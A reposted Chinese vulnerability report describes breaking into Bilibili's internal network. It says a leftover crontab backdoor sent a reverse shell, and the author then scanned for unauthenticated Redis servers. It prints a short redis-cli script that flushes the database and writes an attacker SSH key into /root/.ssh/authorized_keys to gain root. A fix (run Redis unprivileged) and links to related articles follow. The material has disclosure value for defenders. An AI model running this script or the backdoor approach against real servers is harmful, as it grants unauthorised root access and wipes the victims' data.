默认 redis 安装存在漏洞, 可以直接 获取 root 权限

转载 2016年01月28日 12:08:41

转载地址:http://www.2cto.com/Article/201512/454117.html


我假装闲来无事地在 VPS 上监听了某一个端口,然后突然反弹过来一个 shell。嗯,假装是不知道哪年哪月的一个 crontab 后门再次把我带入了 Bilibili 的内网。
内网存在许多 redis 未授权访问,为什么不问问神奇海螺呢?

详细说明:

我假装闲来无事地在 VPS 上监听了某一个端口,然后突然反弹过来一个 shell。

1.png

估计是之前留的 crontab 后门,不过这不重要。

前几天爆出了 redis 未授权访问然后写 authorized_keys 来强行拿权限,总之原理是如此如此,可以看
 http://www.2cto.com/Article/201512/454361.html 来了解具体利用。

在 B 站内网扫描了一下 6379 端口,然后写了一个 sh 脚本来自动化执行。
 

code 区域
?
1
2
3
4
5
<code>redis-cli  -h $1 flushall
    cat foo.txt | redis-cli -h $1 -x set 1
    redis-cli -h $1 config set dir /root/.ssh
    redis-cli -h $1 config set dbfilename authorized_keys
    redis-cli -h $1 save</code>

2.png

然后“姆Q”的一下子,成功了一个。

3.png

Bilibili (゜-゜)つロ 乾杯~

由于 redis 是用 root 权限启动的,所以直接能在 /root/.ssh/ 下面写文件。

5.png

4.png

漏洞证明:

3.png

5.png

4.png

如图所示

修复方案:

用 nobody 权限来启动 redis。,

另外测试的 172.16.0.208、172.16.0.203 的 authorized_keys 已恢复,crontab 后门已清理。


Redis配置不当致使root被提权漏洞

Redis配置不当致使root被提权漏洞Dear all~ 最近Redis服务被曝出因配置不当,可能造成数据库被恶意清空,或被黑客利用写入后门文件造成进一步入侵,请关注!一、漏洞发布日期 201...
  • zjcjava
  • zjcjava
  • 2017-11-17 10:35:03
  • 998

小白日记25:kali渗透测试之提权(五)--利用配置不当提权

利用配置不当提权
  • ZiXuanFY
  • ZiXuanFY
  • 2016-10-09 00:11:59
  • 1024

利用老版本 Redis 漏洞获取服务器 root 权限。

1. 背景介绍redis 服务默认情况下是未配置密码的,如果所在服务器恰好开了外网则此时很容易借助 redis 的漏洞获取到目标服务器的 root 权限。 yum 安装的 3.x 系列的 redis...
  • u010472499
  • u010472499
  • 2017-12-26 19:41:48
  • 169

nginx+rtmp子进程管理不当导致频繁的deleteStream(未断开连接)

当客户端未断开连接,内部却频繁断掉,频繁deleteStream and createStream createStream, client: 127.0.0.1, server: 0.0.0.0:...
  • u010026901
  • u010026901
  • 2016-01-04 10:11:25
  • 1949

阿里云服务器Centos7成为挖矿肉鸡被挖矿imWBR1耗尽CPU

背景检查服务器资源的时候发现服务器的CPUC已经100%,而且是一直是这样, 最近三天的CPU使用率直方图 当前一个小时的直方图 18:15:00笔直下降的是我在处理后CPU的使用率情况...
  • zjcjava
  • zjcjava
  • 2017-12-23 19:46:57
  • 2503

redis配置说明

redis配置说明maxmemory设置 redis 能够使用的最大内存。当内存满了的时候,如果还接收到 set 命令,redis 将 先尝试剔除设置过 expire 信息的 key,而不管该 key...
  • zhengyong15984285623
  • zhengyong15984285623
  • 2016-04-16 19:10:46
  • 649

redis安装和使用

1、安装redis: 上传文件到固定目录下;版本为: redis-3.2.0tar xzvf redis-3.2.0.tar.gzcd redis-3.2.0make && make install...
  • topwqp
  • topwqp
  • 2016-08-02 19:50:58
  • 1166

使用普通账户安装 Redis 服务

前面提到过黑客利用 Redis 漏洞实现无密码 root 登录。而 Redis 自身提供的安装方式和 Redis 服务必须使用 root 进行安装和启动,为这个漏洞提供了大大的便利。这里我整理了一个使...
  • AlexWoo0501
  • AlexWoo0501
  • 2016-01-06 21:04:24
  • 4027

Redis学习笔记四——redis安全设置

Redis的安全设计是在"Redis运行在可信环境"这个前提下做出的,在生产环境运行时不能允许外界直接连接到Redis服务器上,而应该通过应用程序进行中转,运行在可信的环境中是保证Redis安全的最重...
  • a491857321
  • a491857321
  • 2016-07-21 18:31:48
  • 4888

redis安全设置

Redis的安全设计是在"Redis运行在可信环境"这个前提下做出的,在生产环境运行时不能允许外界直接连接到Redis服务器上,而应该通过应用程序进行中转,运行在可信的环境中是保证Redis安全的最重...
  • luyaran
  • luyaran
  • 2017-02-16 10:00:34
  • 499
收藏助手
不良信息举报
您举报文章:默认 redis 安装存在漏洞, 可以直接 获取 root 权限
举报原因:
原因补充:

(最多只允许输入30个字)